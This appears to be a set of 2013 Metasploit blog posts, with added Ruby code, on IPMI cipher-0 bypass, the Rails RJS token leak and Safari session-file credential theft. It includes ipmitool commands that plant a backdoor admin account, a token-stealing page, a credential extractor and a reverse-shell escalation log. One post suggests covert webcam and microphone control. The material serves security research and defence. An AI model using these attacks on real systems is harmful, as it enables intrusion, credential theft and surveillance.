
This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.

 

This year, infosec superstars Dan Farmer and HD Moore have been making an impressive effort to spread the word about the security of Baseboard Management Controllers (BMCs), the embedded computers that provide remote management for servers and are installed in nearly all servers manufactured today, and of the Intelligent Platform Management Interface (IPMI), the server management protocol that runs on the BMC. Dan Farmer published a paper on IPMI and BMC security, disclosing several issues found while reviewing the IPMI network protocol, which listens on UDP port 623. HD put together a set of techniques and Metasploit modules to exploit several of these issues. They include anonymous authentication and default credentials on many BMCs, retrieval of password hashes (the IPMI 2.0 RAKP authentication exchange hands back an HMAC keyed with the user's password before the client has proven anything, so the hash can be cracked offline), and a full authentication bypass on IPMI 2.0 by requesting cipher suite 0.


Let me remind you how to exploit the "Cipher 0" issue, because it is nifty! Cipher suite 0 means "no authentication, no integrity, no confidentiality": a BMC that accepts it will open an RMCP+ session for any known username with whatever password you supply. You can use the ipmi_cipher_zero module to identify systems that have cipher 0 enabled:


  
$ msfconsole
 
       =[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1119 exploits - 638 auxiliary - 179 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
 
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.99:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.132:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.141:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.153:623 VULNERABLE: Accepted a session open request for cipher zero


And then use the standard "ipmitool" command-line interface with a valid username (the password is ignored) to create a backdoor account. Note that the first attempt, without -C 0, fails because the made-up password is rejected under a real cipher suite; the same command with -C 0 is accepted:


  
$ ipmitool -I lanplus -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
Error: Unable to establish IPMI v2 / RMCP+ session
Get User Access command failed (channel 14, user 1)
 
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   (Empty User)     true    false      false      NO ACCESS
 
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set name 2 hdm
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set password 2 password
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user priv 2 4
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user enable 2
 
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   hdm              true    false      true       ADMINISTRATOR
 
$ ssh hdm@10.0.0.99
hdm@10.0.0.99's password: password
 
User:hdm logged-in to ILOMXQ3469216(10.0.0.99)
iLO 4 Advanced Evaluation 1.13 at  Nov 08 2012
Server Name: host is unnamed
Server Power: On
 
</>hpiLO->

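What the scanner actually puts on the wire is a single RMCP+ Open Session Request that proposes cipher suite 0; a BMC that answers with status 0 and echoes the zero algorithms back is the one the module reports as vulnerable. Here is that exchange as an added example in Ruby. It is not the ipmi_cipher_zero module's code, the SAMPLE_* replies are constructed rather than captured, and the console session ID and message tag are arbitrary values I picked.

```ruby
require 'socket'
require 'timeout'

# Added example (not the Metasploit module's code): build one RMCP+ Open Session
# Request that proposes cipher suite 0 (authentication, integrity and
# confidentiality algorithms all 0) and parse the BMC's Open Session Response.
# Packet layout follows the IPMI 2.0 specification's RMCP+ session setup.
module IpmiCipherZero
  RMCP_HEADER   = [0x06, 0x00, 0xff, 0x07].pack('C4').freeze # RMCP version 6, reserved, seq 0xff (none), class IPMI
  AUTH_RMCPPLUS = 0x06  # session header auth type for RMCP+ (IPMI 2.0)
  PT_OPEN_REQ   = 0x10  # payload type: RMCP+ Open Session Request
  PT_OPEN_RESP  = 0x11  # payload type: RMCP+ Open Session Response

  Result = Struct.new(:status, :auth, :integ, :conf) do
    # Vulnerable only if the BMC accepted the session AND kept all three algorithms at 0.
    def cipher_zero?
      status == 0 && auth == 0 && integ == 0 && conf == 0
    end
  end

  # tag and console_id are arbitrary (assumption); the BMC echoes both back.
  def self.open_session_request(tag: 0x01, console_id: 0xa0a2a3a4)
    payload  = [tag, 0x00, 0, 0, console_id].pack('CCCCV') # tag, max priv 0 = highest available, 2 reserved, console session id (LE)
    payload << [0x00, 0, 0, 8, 0, 0, 0, 0].pack('C8')      # authentication record, algorithm 0 = RAKP-none
    payload << [0x01, 0, 0, 8, 0, 0, 0, 0].pack('C8')      # integrity record, algorithm 0 = none
    payload << [0x02, 0, 0, 8, 0, 0, 0, 0].pack('C8')      # confidentiality record, algorithm 0 = none
    header   = [AUTH_RMCPPLUS, PT_OPEN_REQ, 0, 0, payload.bytesize].pack('CCVVv') # session id 0, seq 0, length (LE)
    RMCP_HEADER + header + payload
  end

  # Returns nil for anything that is not an RMCP+ Open Session Response.
  def self.parse_open_session_response(pkt)
    pkt = pkt.b
    return nil if pkt.bytesize < 24
    return nil unless pkt[0, 4].unpack('C4').values_at(0, 3) == [0x06, 0x07]
    auth_type, ptype, _sid, _seq, len = pkt[4, 12].unpack('CCVVv')
    return nil unless auth_type == AUTH_RMCPPLUS && (ptype & 0x3f) == PT_OPEN_RESP
    payload = pkt[16, len].to_s
    return nil if payload.bytesize < 8
    status = payload.getbyte(1)
    # On error the BMC may stop after the console session id, so only 8 bytes are guaranteed.
    return Result.new(status, nil, nil, nil) unless status == 0 && payload.bytesize >= 36
    # Algorithm bytes sit at offset 4 of the three 8-byte records that follow the two session ids.
    Result.new(status, payload.getbyte(16), payload.getbyte(24), payload.getbyte(32))
  end

  # Live probe: one UDP datagram to port 623, nil on timeout.
  def self.probe(host, port: 623, timeout: 3)
    sock = UDPSocket.new
    sock.send(open_session_request, 0, host, port)
    data, _from = Timeout.timeout(timeout) { sock.recvfrom(512) }
    parse_open_session_response(data)
  rescue Timeout::Error
    nil
  ensure
    sock&.close
  end

  # Constructed replies for offline testing (not real captures).
  SAMPLE_ACCEPT = (RMCP_HEADER + [AUTH_RMCPPLUS, PT_OPEN_RESP, 0, 0, 36].pack('CCVVv') +
                   [0x01, 0x00, 0x04, 0x00, 0xa0a2a3a4, 0x02000000].pack('CCCCVV') + # tag, status 0, priv ADMIN, ids
                   [0x00, 0, 0, 8, 0, 0, 0, 0].pack('C8') +
                   [0x01, 0, 0, 8, 0, 0, 0, 0].pack('C8') +
                   [0x02, 0, 0, 8, 0, 0, 0, 0].pack('C8')).freeze
  SAMPLE_REJECT = (RMCP_HEADER + [AUTH_RMCPPLUS, PT_OPEN_RESP, 0, 0, 8].pack('CCVVv') +
                   [0x01, 0x11, 0x00, 0x00, 0xa0a2a3a4].pack('CCCCV')).freeze # status 0x11: no cipher suite match
end

if $PROGRAM_NAME == __FILE__
  ARGV.each do |host|
    r = IpmiCipherZero.probe(host)
    verdict = if r.nil? then 'no reply'
              elsif r.cipher_zero? then 'VULNERABLE: cipher 0 accepted'
              else "rejected (status 0x#{r.status.to_s(16)})"
              end
    puts "#{host}: #{verdict}"
  end
end
```

Run it as `ruby ipmi_cipher_zero.rb 10.0.0.99` against BMCs you are authorized to test. A nil result only means nothing came back within the timeout, which usually means 623/udp is filtered; a non-zero status with -C 0 still disabled is the answer you want to see on a hardened BMC.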
 

Simple and powerful! Remember, at the time of release Dan and HD found 53,000 IPMI 2.0 systems vulnerable to password bypass due to Cipher 0. If you haven't done so already, you might consider starting the year by reviewing the FAQ about the BMC and IPMI research, Dan's paper, and HD Moore's penetration tester's guide!

 

Not content with that research, later the same year HD Moore published the results of a security analysis of the Supermicro IPMI firmware, used in the baseboard management controller (BMC) of many Supermicro motherboards. In this analysis HD found static encryption keys, hardcoded credentials, and several issues in the web management interface, including overflows, of course!

 

Exploiting memory corruption on these ARM-based embedded devices is a really challenging exercise which involves emulation, live exploitation, and keeping a lot of assembly in your head! If you would like to dig into the details, we published a write-up of that exploitation journey too!

 

All in all, an impressive body of research which is worth checking out carefully. In the meantime, I'm pretty sure these heavyweights are working on more awesome stuff... can't wait to see what 2014 offers the security community!

This post is the fifth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.

Several weeks ago, Egor Homakov wrote a blog post pointing out a common info leak vulnerability in many Rails apps that utilize Remote JavaScript. The attack vector and implications can be hard to wrap your head around, so in this post I'll explain how the vulnerability occurs and how to exploit it.

What is Remote Javascript?

Remote JavaScript (RJS) was a pattern prescribed by Rails < 2 to implement dynamic web sites. In RJS the user-facing parts of a website (HTML and JS) act as a "dumb client" for the server: when dynamic action is needed, the client calls a JavaScript helper that sends a request to the server. The server then performs the necessary logic and generates and responds with JavaScript code, which is sent back to the client and eval()'d.

The RJS approach has some advantages, as rails creator dhh points out in a recent blog post. However, suffice it to say that RJS breaks down as soon as you need complex client-side code, and a server API that responds with UI-dependent JavaScript is not very reusable. So Rails mostly has moved away from the RJS approach (JSON APIs and client-heavy stacks are the new direction), but still supports RJS out of the box.

So what's the problem?

Unfortunately, RJS is insecure by default. Imagine a developer on a Rails app that uses RJS is asked to make an Ajax-based login pop-up page. Following the RJS pattern, the developer would write some JavaScript that, when the "Login" link is clicked, asks the remote server what to do. The developer would add a controller action to the Rails app that responds with the JavaScript required to show the login form:

class DashboardController < ApplicationController
  # GET /dashboard/login.js answers with JavaScript, not HTML
  def login
    respond_to do |format|
      format.js do
        render :partial => 'show_login_form'
      end
    end
  end
end

Following the RJS pattern, the _show_login_form.js.erb partial returns some JavaScript code to update the login form container:

$("#login").show().html("<%= escape_javascript(render :partial => 'login/form') %>");

Which, when rendered, produces code such as the following (line breaks added for readability; escape_javascript actually emits the markup as a single string with quotes and newlines escaped):

$("#login").show().html("
  <form action='/login' method='POST'>
    <input type='hidden' name='auth_token' value='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'>
    <table>
      <tr>
        <td>Name</td>
        <td><input type='text' name='name'></td>
      </tr>
      <tr>
        <td>Password</td>
        <td><input type='password' name='password'></td>
      </tr>
    </table>
  </form>");

Now imagine user Tom is logged into the Rails app (which we'll say is served from railsapp.com). An unrelated website attacker.com might serve Tom the following code:

<html>
  <body>
    <script src='https://railsapp.com/dashboard/login.js'></script>
  </body>
</html>

Because <script> tags are allowed to be cross-origin (this is useful for CDNs), Tom's browser happily sends a GET request to railsapp.com, attaching his railsapp.com cookie. The RJS script is generated and returned to Tom, and his browser executes it. By stubbing out the necessary functions in the global scope, attacker.com can easily gain access to the string of HTML that is sent back:

<html>
  <body>
    <script>
      function $() {
        return {
          show: function() {
            return {
              html: function(str) {
                alert(str);
              }
            };
          }
        };
      }
    </script>
    <script src='https://railsapp.com/dashboard/login.js'></script>
  </body>
</html>

And now attacker.com can easily parse out Tom's CSRF auth token and start issuing malicious CSRF requests to railsapp.com. This means that attacker.com can submit any form in railsapp.com. The same technique can be used to leak other information besides auth token, including logged-in status, account name, etc.

As a pentester, how can I spot this bug while auditing a web app?

It is pretty easy to find this vulnerability. Click around a while in the web app and keep Web Inspector's Network tab open. Look for .js requests sent sometime after a page load. Any response to a .js request that includes private info (auth token, user ID, existence of a login session) can be "hijacked" using an exploit similar to the above PoC.
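To take that manual Network-tab review one step further, the following added example (not from the original post) walks a HAR export from the browser's developer tools and flags script responses that were fetched with a Cookie header and contain an anti-CSRF token, an e-mail address or login-state markers. The HAR embedded in it is constructed from the login.js response above, not a real capture, and the marker regexes are my own heuristics, so treat hits as leads to confirm by hand with a PoC like the one earlier.

```ruby
require 'json'

# Added example: find RJS-leak candidates in a HAR 1.2 export. A script response
# can only leak user data if (a) the browser sent the session cookie with the
# request and (b) the body is user-specific. Both checks are heuristics.
module RjsLeakFinder
  MARKERS = {
    csrf_token:  /(?:authenticity_token|auth_token|csrf-token).{0,40}?[A-Za-z0-9+\/=_-]{16,}/,
    email:       /[\w.+-]+@[\w-]+\.[a-z]{2,}/i,
    login_state: /\b(?:logged_in|signed_in|current_user)\b/,
  }.freeze

  # A response counts as "script" by URL extension or by Content-Type.
  def self.script_response?(entry)
    path = entry.dig('request', 'url').to_s.split('?').first.to_s
    mime = entry.dig('response', 'content', 'mimeType').to_s
    path.end_with?('.js') || mime.include?('javascript')
  end

  # Cross-origin <script src> fetches carry cookies, so only cookie-bearing
  # requests can produce a response worth hijacking.
  def self.sent_cookie?(entry)
    Array(entry.dig('request', 'headers')).any? { |h| h['name'].to_s.casecmp?('cookie') }
  end

  # One finding per (url, marker kind) with a short sample of the match.
  def self.findings(har)
    Array(har.dig('log', 'entries')).select { |e| script_response?(e) && sent_cookie?(e) }.flat_map do |e|
      body = e.dig('response', 'content', 'text').to_s
      MARKERS.filter_map do |kind, re|
        m = re.match(body)
        { url: e.dig('request', 'url'), kind: kind, sample: m[0][0, 60] } if m
      end
    end
  end

  def self.scan_file(path)
    findings(JSON.parse(File.read(path)))
  end

  # Constructed HAR (not a real capture): a static library, the RJS login
  # response from the post, and a JSON endpoint that is not a script at all.
  COOKIE = [{ 'name' => 'Cookie', 'value' => '_session_id=abc' }].freeze
  SAMPLE_HAR = {
    'log' => { 'entries' => [
      { 'request'  => { 'url' => 'https://railsapp.com/assets/jquery.js', 'headers' => COOKIE },
        'response' => { 'content' => { 'mimeType' => 'application/javascript',
                                       'text' => '/*! jQuery v1.10 */ (function(e,t){...})(window);' } } },
      { 'request'  => { 'url' => 'https://railsapp.com/dashboard/login.js', 'headers' => COOKIE },
        'response' => { 'content' => { 'mimeType' => 'text/javascript',
                                       'text' => %q{$("#login").show().html("<form action=\'/login\' method=\'POST\'><input type=\'hidden\' name=\'auth_token\' value=\'n7XkQ2pZ9vL4sT8wR1yB6cD3fH0jK5mA\'>...</form>")} } } },
      { 'request'  => { 'url' => 'https://railsapp.com/api/users.json', 'headers' => COOKIE },
        'response' => { 'content' => { 'mimeType' => 'application/json',
                                       'text' => '{"current_user":"tom@railsapp.com"}' } } },
    ] }
  }.freeze
end
```

Export the HAR after clicking around while logged in, then call `RjsLeakFinder.scan_file('railsapp.har')`. The JSON endpoint in the sample is deliberately ignored: a cross-origin `<script>` cannot read a JSON body, so only responses the browser will execute as script are in scope.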

How can I fix this in my web app?

The fix prescribed by Rails is to go through your code and add request.xhr? checks to every controller action that uses RJS (a cross-origin <script> fetch cannot carry the X-Requested-With header that the Ajax helpers add, which is what request.xhr? looks for). This is annoying, and a big pain if you have a large existing code base that needs patching. Since Metasploit Pro was affected by the vulnerability, we needed a patch quickly. So I present our solution: we now check all .js requests to ensure that the REFERER header is present and points at our own host and port. The only downside is that your app will break for users behind proxies that strip referers. Additionally, this patch will not work for you if you plan on serving cross-domain JavaScript (e.g. for a hosted JavaScript SDK). If you can stomach that sacrifice, here is a Rails initializer that fixes the security hole. Drop it in config/initializers of your Rails app:

# This patch adds a before_filter to all controllers that prevents xdomain
# .js requests from being rendered successfully.

module RemoteJavascriptRefererCheck
  extend ActiveSupport::Concern

  included do
    require 'uri'
    before_filter :check_rjs_referer, :if => ->(controller) { controller.request.format.js? }
  end

  # prevent generated rjs scripts from being exfiltrated by remote sites
  # see http://homakov.blogspot.com/2013/11/rjs-leaking-vulnerability-in-multiple.html
  def check_rjs_referer
    referer_uri = begin
      URI.parse(request.env["HTTP_REFERER"])
    rescue URI::InvalidURIError
      nil
    end

    # if request comes from a cross domain document
    if referer_uri.blank? or
      (request.host.present? and referer_uri.host != request.host) or
      (request.port.present? and referer_uri.port != request.port)

      head :unauthorized
    end
  end
end

# shove the check into the base controller so it gets hit on every route
ApplicationController.class_eval do
  include RemoteJavascriptRefererCheck
end

And your server will now answer 401 Unauthorized to any RJS request that does not carry a same-origin REFERER. A gist is available here; just download it and place it in $RAILS_ROOT/config/initializers.

This post is the fourth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.


Every year during a major holiday, we crawl out from our own bat cave and actually spend time with our family and friends. People start asking what you do for a living. You respond with something you probably regret, like "I am a penetration tester", because to an average person your job title probably sounds no different from a porn star, or someone who can start a fire with their thoughts. After some clarification, they kind of grasp what you do - apparently you do something magical with them computers. And then the inevitable happens: your ma and pa, brothers and sisters, your uncle, and even the neighbor come to you and ask you to fix their computers, or maybe do a demonstration like blowing up a computer like in the movie "Live Free or Die Hard" they just saw.

 

Let's face it, you are your family's computer wizard, and it's time to put your skills to "good use", like fixing their computers and getting them educated about the risks of accepting candy from strangers on the Internet. If you're a little overwhelmed, fear no more, because with Metasploit in hand you can do ANYTHING... well, almost anything. Here are a few common tricks that we actually find practical during a family reunion:

 

Lost File, Please Recover!

 

Metasploit has two extremely handy data recovery tools you can use. The first one is post/windows/gather/forensics/recovery_files.rb, brought to you by Borja Merino. The other is post/windows/gather/forensics/imager.rb, by Wesley McGrew.

 

The recovery_files module basically tries to recover files that got recently deleted. Borja already made a video while making the module, so we'll let the video do the talking:

 

[Screenshot: Borja's video of the recovery_files module]

 

The imager module functions a bit like the dd command on Unix, except that it targets Windows, using Windows API calls through Railgun. It performs a byte-for-byte image of remote disks and volumes. Byte-for-byte imaging is obviously a time-consuming task, so we advise leaving this option for last.

 

What's the wireless password again?

 

Say everybody comes home for the holiday, and they've brought in all kinds of gadgets (XBOX One, Kindle Reader, laptops, smart phones, etc). Hey ma, what's the Wifi password? Your parents might not actually know the answer to that, and they blame the technician who set up the network months ago... or was it years ago? Your mission: to find the wifi password.

 

You can most likely do this by physically connecting to the wireless router and resetting the password that way. Or, on your parents' laptop, you can try the post/windows/wlan/wlan_profile post module to see if you can extract the passphrase from the keyMaterial element of the stored Wi-Fi profile.

 

Forgotten Administrator Password?

 

Sometimes it's almost impossible for a regular human being, like your family, not to forget a password. The most common way out is to reset it locally, often with a bootable disk (it depends on the system). However, it is also possible to simply escalate privileges with whatever user account you do have, and go from there. The most basic way is the "getsystem" command in Meterpreter. If that doesn't work, you can try a local exploit module like ppr_flatten_rec:

 

msf exploit(handler) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.0.1.91
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.91:49159) at 2013-12-25 16:30:04 -0600

meterpreter > getuid
Server username: WIN-6NH0Q8CJQVM\sinn3r
meterpreter > background
[*] Backgrounding session 2...

msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec 

msf exploit(ppr_flatten_rec) > set session 2
session => 2
msf exploit(ppr_flatten_rec) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Launching notepad to host the exploit...
[+] Process 3784 launched.
[*] Reflectively injecting the exploit DLL into 3784...
[*] Injecting exploit into 3784 ...
[*] Exploit injected. Injecting payload into 3784...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[*] Sending stage (769024 bytes) to 10.0.1.91
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened (10.0.1.76:4444 -> 10.0.1.91:49160) at 2013-12-25 16:31:32 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 

If you actually managed to escalate privileges, do them a favor and run a system update too while you're at it :-)

 

 

Hollywood Hacking for Entertainment

 

We haven't figured out how to remotely blow up a computer, but here are a few modules that make hacking easy to understand and fun. Surprisingly, kids love playing with these:

 

[Screenshot: Chatroulette]

Webcam manipulation

 

Controlling a webcam is pretty much standard in Hollywood hacking, and you can do that with Metasploit too. Modules such as post/windows/manage/webcam or post/osx/manage/webcam, or the webcam_snap Meterpreter command, are great for this. It's not as awesome as Chatroulette like the one to the left though :-)

 

Microphone manipulation

 

Metasploit is also capable of audio recording. You can use the post/osx/manage/record_mic module, or post/multi/manage/record_mic.

 

Video Broadcasting

 

And of course, who can pass on the opportunity of rickrolling everybody on a holiday?

 

There are also plenty of other Metasploit modules you can use for entertainment purposes; we encourage all of you to browse around our post module directory tree. But if you don't see anything you like, you can always file a feature request on Redmine and let us know. Or please feel free to submit your own :-)

 

As always, remember to run that msfupdate command to make sure you are up to date with Metasploit. For those of you who are new to Metasploit, you can download a copy here, and may the force be with you.

This post is the third in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.

 

Over the last quarter of 2013, we here in the Democratic Freehold of Metasploit found that we needed to modernize our flagship remote access toolkit (RAT), Meterpreter. That started with cleaving Meterpreter out of the main Metasploit repository and setting it up with its own repository, and then bringing in a dedicated Meterpreter hacker, the indomitable OJ TheColonial Reeves. We couldn't be happier with the results so far.

 

OJ has kindly written up an extensive report of everything he's worked on with Meterpreter and post-exploitation on Windows hosts over on his blog. I encourage you to head over there and read his 3 Months of Meterpreter. For bullet points, the TL;DR is:

 

  • A Sane Build Environment

The biggest complaint we used to get about Meterpreter is the pain and suffering one had to go through just to build the darn thing. OJ has reworked all that from soup to nuts, and now Meterpreter builds cleanly and easily using Microsoft Visual Studio Express. If this is your complaint as well, please take a look at the README and amaze at the single 'make' command to kick things off.

 

  • Rock Solid Stability

Sometimes, Meterpreter would crash out on the target, often for mysterious reasons. No longer! OJ tackled pretty much all of the outstanding bugs having to do with Meterpreter stability, and it's better than ever now.

 


  • Securification

Metasploit bread-and-butter exploits tend to be classic stack buffer overflows... so after a code audit, we've patched up all the obvious paths to remote code execution with Meterpreter. While we haven't proven exploitability with the old Meterpreter, we're pretty confident today that you won't get your sessions jacked out from under you by a rival pen-tester. Note, if you're able to successfully subvert a Meterpreter installation, we'd sure appreciate a Metasploit module proving it...

 

  • Enhanced Local Exploits

We've moved the KiTrap0D exploit out of the path for 'getsystem', and promoted it to a proper local exploit for privilege escalation; this has the result of making 'getsystem' procedures a lot more stable in the usual cases, leaving it to the penetration tester to decide if she wants to explore additional avenues of escalating to system privileges. Thanks to the submodule-ing of Stephen Fewer's ReflectiveDLLInjection strategy, we've also refactored the ppr_flatten_rec exploit to be a lot more reliable, as well.

 

  • Bunches of New Features

Along the way with making existing Meterpreter functionality more reliable and easier to use, we've added two heaping handfuls of new functionality; better IPv6 support, refreshed Incognito and mimikatz implementations, more robust environment variable enumeration, a new "Extended API" extension (which incidentally provides a nice roadmap on how to write Meterpreter extensions in general), a framework for interrogating ADSI, and so much more.

 

  • Readable Documentation

Finally, Meterpreter ships with inline, automatically generated documentation using Doxygen, a pretty standard syntax for annotation-based docs. Since you can easily generate the latest docs locally, you no longer have to rely on (or get mislead by) outdated API docs when hacking on Meterpreter.

 

Again, there are tons of details on all this in OJ's post, so if this kind of thing excites you, feel free to roll up your sleeves and dive into Meterpreter's guts. Payload integration in general is kind of what puts the "meta" in Metasploit -- having all this available to exploit developers and penetration testers should make security R&D move along much faster and cleaner, and get you from proof-of-concept to functional shells in real-world situations with less time and effort.

 

Happy haXmas!

This post is the second in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.


If you are reading this blog post, I reckon you are a somewhat geeky security person, and you use some sort of application like KeePass, Keychain, LastPass, etc. to manage your passwords. After all, we all know too well that password stealing is a major security issue, and sometimes this is more than enough to get you to all kinds of wonderful places like the domain controller, the CEO's laptop, and all the goodies along the way. It also makes my heart die a little (in a good way, I guess?) when I hear of professional penetration testers compromising an entire network just by stealing passwords, reusing them or passing the hash, while we spend an intense amount of time building awesome exploits that they don't actually have to use. I mean, come on, man! :-) But of course, Metasploit creates more than just exploits; it covers the whole offensive package, so password stealing is definitely always on the menu.

 

Recently, I came across an article from SecureList about the discovery that Apple Safari stores session states unencrypted. The "ah-ha, jackpot!" moment kicked in because stuff like this is such an easy win, and I decided to take a look. The problem is simple: Apple Safari has a feature that lets you reopen all the windows from your last session with the click of a button, and the magic behind it is that these session states are stored in a file named LastSession.plist. This is a binary property list that can be converted into a more human-readable format with the built-in plutil command in OS X; your session data is then found inside, encoded in Base64. And you don't really have to be a computer genius to decode that; there are tools available online, just let me google that for ya.

 

And yes, I also just described how to write that module. I have been told the best crackers in the world can write this in under 60 minutes, but fortunately I've already written it for you, so you can steal this in under 60 seconds. Woohoo!

 
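The decoding just described, as an added example in Ruby that is not the module's code: convert the plist to XML with plutil, base64-decode every <data> element, and look inside the blobs that carry a form content type for a urlencoded body with credential-looking fields. The sample plist and the blob inside it are constructed to mirror the screenshot below (the key names, the blob layout and the CRED_KEYS list are my assumptions, not the real on-disk format), so it runs anywhere; the load_plist_xml helper is the only part that needs OS X.

```ruby
require 'base64'
require 'uri'

# Added example (not the safari_lastsession module's code): pull the base64
# blobs out of an XML-converted LastSession.plist and look inside each decoded
# blob for a form body that Safari saved together with the page state.
module SafariLastSession
  # Form field names worth reporting (assumption: common login form names).
  CRED_KEYS = %w[Email Passwd email password passwd user username login].freeze

  # Convert the binary plist with OS X's plutil (assumption: only works on OS X,
  # and only for your own profile unless you are root).
  def self.load_plist_xml(path = File.expand_path('~/Library/Safari/LastSession.plist'))
    IO.popen(['plutil', '-convert', 'xml1', '-o', '-', path], &:read)
  end

  # Every <data> element in the XML plist is base64; decode them all.
  def self.blobs(xml)
    xml.scan(%r{<data>\s*([A-Za-z0-9+/=\s]+?)\s*</data>}m).map do |(b64)|
      Base64.decode64(b64.delete(" \t\r\n"))
    end
  end

  # A blob that carried a POST contains the request content type and, nearby,
  # the urlencoded body. Return every body holding at least one credential key.
  def self.credentials(blob)
    blob = blob.b
    return [] unless blob.include?('application/x-www-form-urlencoded')
    # runs of key=value&key=value, terminated by whitespace or a control byte
    blob.scan(/[\w.%+-]+=[^&\s[:cntrl:]]*(?:&[\w.%+-]+=[^&\s[:cntrl:]]*)+/).filter_map do |body|
      params = URI.decode_www_form(body).to_h
      hit = params.select { |k, _| CRED_KEYS.include?(k) }
      hit unless hit.empty?
    end
  end

  def self.scan(xml)
    blobs(xml).flat_map { |b| credentials(b) }
  end

  # Constructed sample (not a real plist): one entry that saved a failed Google
  # login POST, one that saved nothing interesting.
  FAKE_BLOB = ("bplist00\x00\x01SessionHistoryEntryURL\x00https://accounts.google.com/ServiceLogin\x00" \
               "application/x-www-form-urlencoded\x00Email=kaspersky_login&Passwd=kaspersky_passwd&signIn=Sign+in\x00").b
  SAMPLE_PLIST_XML = <<~XML.freeze
    <?xml version="1.0" encoding="UTF-8"?>
    <plist version="1.0"><dict>
      <key>SessionWindows</key><array><dict>
        <key>SessionHistoryEntryData</key>
        <data>#{Base64.strict_encode64(FAKE_BLOB)}</data>
        <key>SessionHistoryEntryData</key>
        <data>#{Base64.strict_encode64('bplist00 no form body here'.b)}</data>
      </dict></array>
    </dict></plist>
  XML
end
```

On a Mac, `SafariLastSession.scan(SafariLastSession.load_plist_xml)` runs the whole chain against your own profile; anything it returns is sitting in clear text on disk and will also end up in Metasploit's loot directory if you use the module instead.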

As a bit of eye candy, the researcher behind the discovery (Vyacheslav Zakorzhevsky) demonstrated stealing a Gmail credential with the flaw; his screenshot is this:

[Screenshot: safari_loophole_01.png, decoded LastSession.plist data containing the Gmail login POST]

Look closely, and you'll see words like "Email=kaspersky_login&Passwd=kaspersky_passwd", "application/x-www-form-urlencoded", "accounts.google.com"... yeah, those are quite lovely. In case you're curious where this data is from, you can simply find it in Google's login form, specifically at https://accounts.google.com/ServiceLogin, I hope you like HTML:

 

[Screenshot: HTML source of the Google ServiceLogin form]

 

To trigger Safari storing your session data, here's an example of how to do that safely in case you want to test it yourself:

 

  1. Go to https://accounts.google.com/ServiceLogin
  2. Enter an invalid username and password, click "Sign In"
  3. Google should tell you the credential is bad, now press refresh.

 

And now that session state should be stored in ~/Library/Safari/LastSession.plist. If you're lazy like me, you can just run Metasploit's post/osx/gather/safari_lastsession module:

 

[Screenshot: output of the post/osx/gather/safari_lastsession module]

 

The above test was conducted against Apple Safari version 7.0.1 (9537.73.11) on OS X 10.9.1. Yes, it is the latest version of Safari. Yes, someone did say this was patched in Safari 6.1, except not really. We've already informed the appropriate party to verify this patch information, and I'm sure this will be resolved shortly. Meanwhile, if you are a Safari user, please do this:

 

  1. Open Safari
  2. On your top left corner, click on "Safari" -> "Preferences"
  3. Click on the "Privacy" tab, and you should see the following - I want you to click that "Remove All Website Data" button real hard and make sure your LastSession.plist is cleared:

 

[Screenshot: Safari Preferences, Privacy tab, "Remove All Website Data" button]

 

Last but not least, if you're still wondering if LastSession.plist is still storing some sensitive data, you can always run the Metasploit module and test it out yourself. Metasploit can be downloaded here if you're new to the game. If you are already a Metasploit user, please make sure to run the msfupdate and that baby will be yours.

 

Oh, and if you do actually extract some username/password, remember to clear your ~/.msf4/loot/ directory. Because the username/password (in plain text) will be stored there, too. The post module should tell you precisely where this file is.

This post is the first in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.

 

In 2013 a banking Trojan modified to look for SAP GUI installations was disclosed, a concerning sign that SAP system hacking has gone into mainstream cybercrime. Once the domain of a few isolated APT attacks, SAP appears to be in the crosshairs of hackers who know just how much sensitive data ERP systems house. With more than 248,500 customers in 188 countries, SAP may see an increase in attacks, and its customers face the threat of data theft, fraud and sabotage.

 

